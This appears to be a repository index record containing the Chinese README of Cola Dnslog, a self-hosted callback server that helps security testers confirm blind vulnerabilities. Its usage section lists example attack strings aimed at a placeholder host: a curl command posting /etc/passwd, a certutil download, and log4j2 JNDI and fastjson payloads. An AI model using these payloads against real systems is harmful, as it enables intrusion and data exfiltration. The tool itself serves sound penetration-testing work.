{"id":13846183,"url":"https://github.com/AbelChe/cola_dnslog","last_synced_at":"2025-07-12T05:32:14.446Z","repository":{"id":50717126,"uuid":"519473887","full_name":"AbelChe/cola_dnslog","owner":"AbelChe","description":"Cola Dnslog v1.3.2 更加强大的dnslog平台/无回显漏洞探测辅助平台 完全开源 dnslog httplog ldaplog rmilog 支持dns http ldap rmi等协议 提供API调用方式便于与其他工具结合 支持钉钉机器人、Bark等提醒 支持docker一键部署 后端完全使用python实现 前端基于vue-element-admin二开","archived":false,"fork":false,"pushed_at":"2023-02-06T04:48:57.000Z","size":20957,"stargazers_count":426,"open_issues_count":4,"forks_count":60,"subscribers_count":9,"default_branch":"main","last_synced_at":"2024-08-05T17:46:06.873Z","etag":null,"topics":["bark","dingtalk-robot","dnslog","dnslog-python","element","fastjson","http","httplog","ldap","ldaplog","log4j2","python","rmi","rmilog","ruoyi","vue"],"latest_commit_sha":null,"homepage":"https://abelche.github.io/cola_dnslog/","language":"Vue","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AbelChe.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-07-30T09:30:31.000Z","updated_at":"2024-07-14T13:45:25.000Z","dependencies_parsed_at":"2023-02-18T16:31:38.523Z","dependency_job_id":null,"html_url":"https://github.com/AbelChe/cola_dnslog","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AbelChe","download_url":"https://codeload.github.com/AbelChe/cola_dnslog/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225799472,"owners_count":17526052,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bark","dingtalk-robot","dnslog","dnslog-python","element","fastjson","http","httplog","ldap","ldaplog","log4j2","python","rmi","rmilog","ruoyi","vue"],"created_at":"2024-08-04T17:04:34.809Z","updated_at":"2024-11-21T20:30:18.059Z","avatar_url":"https://github.com/AbelChe.png","language":"Vue","funding_links":[],"categories":["Vue"],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"readme_resource/sugarless.png\" alt=\"sugarless\" width=\"30%\" /\u003e\n\u003cimg src=\"readme_resource/dnslog.png\" alt=\"dnslog\" width=\"30%\" /\u003e\n\u003c/div\u003e\n英文版本在路上......\n\n# Cola Dnslog\n\n\u003cdiv align=\"right\"\u003e\n\u003cp\u003e--AbelChe\u003c/p\u003e\n\u003c/div\u003e\nCola Dnslog 是一款更加强大的dnslog平台（无回显漏洞探测辅助平台），\n\n- 完全开源\n- 支持dns http ldap rmi等协议\n- 提供API调用方式便于与其他工具结合\n- 支持钉钉机器人、Bark等提醒\n- 支持docker一键部署\n\n\n------\n\n涉及到技术、框架：\n\n`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`\n\n可帮助检测漏洞：\n\n`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Bland XXE`\n\n特色：\n\n`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`\n\n[![Stargazers over time](https://starchart.cc/AbelChe/cola_dnslog.svg)](https://starchart.cc/AbelChe/cola_dnslog)\n\n## 🥯 使用方法\n\n\u003e 假设你购买的域名为`example.com`\n\u003e\n\u003e 你的vps ip为`1.1.1.1`\n\n### 域名\n\n请自行购买域名，并将域名的解析服务器托管至部署cola_dnslog的服务器\n\n以godaddy为例\n\n1. 配置域名解析处右上角三个点，点击Host Names\n\n![image-20220717175903352](readme_resource/image-20220717175903352.png)\n\n2. 修改或新增主机名如下图所示，ip地址填写你的vps地址即可\n\n![image-20220717180002176](readme_resource/image-20220717180002176.png)\n\n3. 回到dns管理，将域名服务器修改为`ns1.example.com`和`ns2.example.com`\n\n![image-20220717180242944](readme_resource/image-20220717180242944.png)\n\n### 安装部署\n\n\u003e 因为一些国内网络众所周知的原因，大多数同学使用国内VPS都会卡在前端npm构建的时候，目前暂未找到更好的解决方案，建议使用国外或者网络畅通的VPS搭建。\n\u003e\n\u003e 欢迎大家提issues!\n\n#### Docker（推荐）\n\n##### 一键启动（推荐）\n\n1. 下载源码\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n```\n\n2. 修改docker-compose.yml中environment变量\n\n```yml\n...\n  server:\n    ...\n    environment:\n      DNS_DOMAIN: example.com # 自己的域名\n      NS1_DOMAIN: ns1.example.com # ns1绑定\n      NS2_DOMAIN: ns2.example.com # ns2绑定\n      SERVER_IP: 1.1.1.1 # vps ip\n      HTTP_PORT: 80 # httplog服务端口\n      HTTP_RESPONSE_SERVER_VERSION: nginx # httplog返回头的服务端信息Server: nginx\n      LDAP_PORT: 1389 # ldaplog服务端口\n      RMI_PORT: 1099 # rmilog服务端口\n    ...\n  front:\n  \t...\n    environment:\n      API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 / http://example.com:28001\n    ...\n\n```\n\n3. 启动\n\n```sh\ndocker-compose up -d\n```\n\n4. 启动之后查看docker日志或者查看info.txt获取账号信息\n\n\u003e server端程序运行会在程序根目录创建一个info.txt用于记录初始化的账号信息\n\n```sh\ndocker-compose logs\ndocker exec -it \u003ccontainer_id\u003e cat /coladnslog/info.txt\n```\n\n![image-20220812005813825](readme_resource/image-20220812005813825.png)\n\n\u003e 如果需要自定义端口，请修改`docker-compose.yml`的端口映射`ports`即可\n\n\n\n##### 前后端分离部署\n\n服务端：\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n\ndocker build -t coladnslog_server -f Dockerfile_server .\ndocker run -itd \\\n-e DNS_DOMAIN=example.com \\\n-e NS1_DOMAIN=ns1.example.com \\\n-e NS2_DOMAIN=ns2.example.com \\\n-e SERVER_IP=1.1.1.1 \\\n-e HTTP_PORT=80 \\\n-e HTTP_RESPONSE_SERVER_VERSION=nginx \\\n-e LDAP_PORT=1389 \\\n-e RMI_PORT=1099 \\\n--net=host \\\n--name ColaDnslog_server coladnslog_server\n```\n\n客户端：\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n\nsudo docker build --build-arg VERSION=v1.3.2 -t coladnslog_front -f Dockerfile_front .\nsudo docker run -itd \\\n-p 18080:80 \\\n-e \"API_BASE_URL=http://1.2.3.4:28001\" \\\n--name ColaDnslog_front coladnslog_front\n```\n\n\n\n#### 源码安装\n\n共分四步\n\n##### **第一步 下载源码**\n\n下载源码\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\n```\n\n\u003e 我习惯于将服务用`tmux`放到后台运行\n\n##### **第二步 启动webserver**\n\n安装python（python\u003e=3.7）依赖\n\n注意，需要用python3.7及以上版本，否则会有兼容性问题，多python推荐使用conda\n\n```sh\ncd cola_dnslog\npip install -r requirements.txt\n```\n\n修改根目录下的`config.yaml`\n\n主要需要修改`DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP`\n\n可选: 修改`HTTP_RESPONSE_SERVER_VERSION`伪造http返回中Server字段\n\n```yaml\nglobal:\n  DB_FILENAME: sqlite.db\n\nlogserver:\n  DNS_DOMAIN: example.com\n  NS1_DOMAIN: ns1.example.com\n  NS2_DOMAIN: ns2.example.com\n  SERVER_IP: 1.1.1.1\n  DNS_PORT: 53\n  HTTP_HOST: 0.0.0.0\n  HTTP_PORT: 80\n  HTTP_RESPONSE_SERVER_VERSION: nginx\n  LDAP_HOST: 0.0.0.0\n  LDAP_PORT: 1389\n  RMI_HOST: 0.0.0.0\n  RMI_PORT: 1099\n\nwebserver:\n  HOST: 0.0.0.0\n  PORT: 28001\n  PASSWORD_SALT: 随便一长串字符串，如：cuau89j2iifdas8\n```\n\n启动webserber端和logserver端，注意这里一定要先启动webserver端（因为要先通过webserver端初始化数据库，初始化之后会在终端输出账号、密码、token、logid等信息。\n\n```sh\nchmod +x start_webserver\n./start_webserver\n```\n\n![image-20220730035846090](readme_resource/image-20220730035846090.png)\n\n\n\n##### **第三步 启动logserver**(需要root权限)\n\n```sh\nchmod +x start_logserver\nsudo ./start_logserver\n```\n\n![image-20220730160132103](readme_resource/image-20220730160132103.png)\n\n\n\n##### **第四步 启动前端**\n\n现在来到前端（不一定要和webserver放在一起，你甚至可以通过electron打包成本地客户端），先修改配置文件`.env.production`\n\n```sh\ncd src/front\nvim .env.production\n```\n\n```ini\n# just a flag\nENV = 'production'\n\n# base api\nVUE_APP_BASE_API = 'http://1.1.1.1:28001'\n\nTARGET_API = 'http://1.1.1.1:28001'\n```\n\n然后npm安装依赖、打包、启动http服务（这里可以随意选择http服务器，为了方便我直接用python启动）\n\n```sh\ncd src/front\nnpm install\nnpm run build:prod\n\ncd dist\npython3 -m http.server 18001\n```\n\n至此，三端（webserver端、logserver端、webui前端）已经全部开启！\n\n这时，访问http://1.1.1.1:18001应该可以看到登录页面！\n\n玩得开心！\n\n### 钉钉机器人\n\n在钉钉群新建机器人，安全设置：添加自定义关键词`coladnslog`\n\n![image-20220731231424000](readme_resource/image-20220731231424000.png)\n\n并获取到webhook的token，注意，只需要填写token即可\n\n![image-20220731231912885](readme_resource/image-20220731231912885.png)\n\n进入webui，修改Dingtalk Robot Token为上文获取的token，点击Update保存即可\n\n![image-20220802020311279](readme_resource/image-20220802020311279.png)\n\n效果如下：\n\n\u003cimg src=\"readme_resource/image-20220731231301577.png\" alt=\"image-20220731231301577\" style=\"zoom:33%;\" /\u003e\n\n### Bark\n\n[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)\n\n[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)\n\n同上 进入webui，开启Bark开关，然后修改bark url，点击Update保存\n\n![image-20220802015907678](readme_resource/image-20220802015907678.png)\n\n效果如下：\n\n\u003cimg src=\"readme_resource/image-20220802015642879.png\" alt=\"image-20220802015642879\" style=\"zoom: 25%;\" /\u003e\n\n### 如何使用\n\n上文提到，假定我的域名和ip是`example.com`和`1.1.1.1`，并且我们账户的logid为`qrq`\n\n#### DNS\n\n```sh\nnsloopup `whoami`.qrq.example.com\nping `whoami`.qrq.example.com\n```\n\n#### HTTP\n\n```sh\ncurl 1.1.1.1/qrq/some/info\ncurl -d @/etc/passwd 1.1.1.1/qrq/postdata\ncertutil -urlcache -split -f http://1.1.1.1/x x\n```\n\n#### LDAP\n\nlog4j2 fastjson等可以使用此方法\n\n注意这里必须要令最后路径的最后作为logid，如：`ldapqrq` `xxxxqrq` `qrq` `xxx/qrq`\n\n```\n${jndi:ldap://1.1.1.1:1389/ldapqrq}\n{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://1.1.1.1:1389/ldapqrq\", \"autoCommit\":true}\n```\n\n#### RMI\n\n同上，log4j2 fastjson等\n\n```\n${jndi:rmi://1.1.1.1:1099/rmiqrq}\n{ \"b\":{ \"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://1.1.1.1:1099/rmiqrq\", \"autoCommit\":true } }\n```\n\n## 👀 概览\n\n### 登录\n\n![image-20220730151326711](readme_resource/image-20220730151326711.png)\n\n\n\n### 首页\n\n![image-20220731143149729](readme_resource/image-20220731143149729.png)\n\n\n\n### Dnslog\n\n![image-20230204200108337](readme_resource/image-20230204200108337.png)\n\n\n\n### Httplog\n\n![image-20230204200455783](readme_resource/image-20230204200455783.png)\n\n\n\n### Ldaplog\n\n![image-20230204201704004](readme_resource/image-20230204201704004.png)\n\n\n\n### Rmilog\n\n![image-20230204201750497](readme_resource/image-20230204201750497.png)\n\n\n\n### 账号信息\n\n![image-20220801003540673](readme_resource/image-20220801003540673.png)\n\n\n\n### 钉钉机器人\n\n\u003cimg src=\"readme_resource/image-20220731231301577.png\" alt=\"image-20220731231301577\" style=\"zoom: 25%;\" /\u003e\n\n\n\n### Bark\n\n\u003cimg src=\"readme_resource/image-20220802015642879.png\" alt=\"image-20220802015642879\" style=\"zoom: 25%;\" /\u003e\n\n## 📔 更新日志\n\n- 2023-02-03 v1.3.2\n  1. 修改默认解析记录，domain[.]com和*[.]domain[.]com的A记录查询指向127.0.0.1，增加`md5(serverip)`[.]admin[.]domain[.]com作为域名访问的入口\n  2. 修复问题：logserver报错崩溃`Segmentation fault` [issues19](https://github.com/AbelChe/cola_dnslog/issues/19)\n  4. 修改默认的docker前端部署方式（无需用户编译）\n  4. 增加清除日志功能\n- 2022-08-12 v1.3.1\n  1. 修复docker部署方式dns端口冲突问题\n- 2022-08-12 v1.3.0\n  1. 创建api文档https://abelche.github.io/cola_dnslog/\n  2. 更新docker部署方式\n  3. 修复部分显示问题\n- 2022-08-09 v1.2.2 v1.2.3\n  1. 更新readme\n  2. 修复文件名拼写错误\n- 2022-08-03 v1.2.1\n  1. 更新readme\n- 2022-08-02 v1.2.0\n  1. 增加bark提醒功能\n  2. 修改logserver端http的返回为1x1的gif格式图片\n  3. 增加http返回包里`Server`字段的伪造功能\n  3. 修复前端profile页面开关bug\n- 2022-08-01 v1.1.0\n  1. 增加重新生成token、修改密码功能\n  2. 优化前端展示效果，优化渲染速度\n  3. 增加id排序功能\n  4. 首页Usage部分根据服务端自动生成\n  5. 增加钉钉机器人\n  6. 修复rmi协议解析bug\n- 2022-07-30 v1.0.0\n  1. cola_dnslog发布 v1.0.0\n\n## 🎯 ==TODO==\n\n- [x] 联动钉钉【2022-07-31】 \n- [x] 联动bark【2022-08-02】\n- [x] 添加api文档【2022-08-12】\n- [ ] 增加ip属地功能\n- [x] docker一键部署【2022-08-12】\n- [ ] 其他协议\n- [ ] 增加mysql等数据库的支持\n\n## 📜 声明\n\n本项目使用 Apache License 2.0\n\n\n## 🌟 404星链计划\n![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)\n\nCola Dnslog 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)\n\n## 💦 其他\n\n### 🎖 他们也出力了！\n\n\u003ctable\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/Weik1\"\u003e\u003cimg src=\"https://avatars.githubusercontent.com/u/34065927?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eWeik1\n\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e🐡\n  \u003c/tr\u003e\n\u003ctable\u003e\n\n### 🎉 参考\n\n- https://panjiachen.github.io/vue-element-admin-site/zh/\n- [https://github.com/NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper)\n- https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/faq.html#netcontact\n- http://www.hackdig.com/02/hack-596460.htm\n- 太多了没法一一列出......................\n\n### ☕️ buy me a coffee 3q\n\n师傅们可以加我wx，一起交流进步`RG9nZ3lDaGVuZwo=`\n\n| 给他买杯咖啡，让他接着码！ | 也可以加星球一起交流（免费） |\n| -------------------------- | -------------------------- |\n\n\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"readme_resource/wx.jpg\" alt=\"IMG_4788\" width=\"40%\" /\u003e\n\u003cimg src=\"readme_resource/xq.jpg\" alt=\"xq.jpg\" width=\"45%\" /\u003e\n\u003c/div\u003e","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAbelChe%2Fcola_dnslog","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAbelChe%2Fcola_dnslog","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAbelChe%2Fcola_dnslog/lists"}